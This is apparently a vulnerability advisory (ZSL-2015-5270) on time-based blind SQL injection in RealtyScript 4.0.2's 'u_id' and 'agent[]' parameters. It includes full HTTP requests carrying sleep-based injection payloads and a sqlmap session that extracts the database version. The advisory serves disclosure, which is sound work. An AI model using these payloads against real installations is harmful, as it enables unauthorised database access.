RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version:4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office,or entrepreneur to be
up and running with a real estate web site in minutes. The software
isin daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameter 'u_id'and the POST parameter 'agent[]'isnot properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Apache/2.4.6(CentOS)
PHP/5.4.16
MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5270
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php
01.10.2015--(1)
GET /admin/users.php?req=remove&u_id=103and(select *from(select(sleep(66)))a)--& HTTP/1.1(2)
POST /admin/mailer.php HTTP/1.1
Host: TARGET
Content-Length:62
Cache-Control:max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://TARGET
Upgrade-Insecure-Requests:1
User-Agent: Mozilla/5.0(Windows NT 6.1; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/admin/mailer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5;
agent[]=102and(select *from(select(sleep(67)))a)--&subject=test&message=t00t^^&submit_mailer=Send
======================================.sqlmap session output =======================================
$ sqlmap -r request1.txt -p "u_id"--dbms=MySQL --os=Linux --sql-query="SELECT @@version"
_
___ ___||_____ ___ ___{1.0-dev-04c1d43}|_ -|.|||.'|.||___|_|_|_|_|_|__,|_||_||_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.[*] starting at 14:36:36[14:36:36][INFO] parsing HTTP request from'request1.txt'[14:36:36][INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
Parameter: u_id (GET)
Type: AND/OR time-based blind
Title: MySQL >=5.0.12 AND time-based blind (SELECT)
Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM)---[14:36:36][INFO] testing MySQL
[14:36:36][INFO] confirming MySQL
[14:36:36][INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >=5.0.0[14:36:36][INFO] fetching SQL SELECT statement query output:'SELECT @@version'[14:36:36][WARNING] time-based comparison requires larger statistical model, please wait..............................[14:36:45][WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s)for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:37:03][INFO] adjusting time delay to 2 seconds due to good response times
5.5.41-MariaDB
SELECT @@version:'5.5.41-MariaDB'[14:38:50][INFO] fetched data logged to text files under '/.sqlmap/output/TARGET'[*] shutting down at 14:38:50======================================= sqlmap session output.======================================
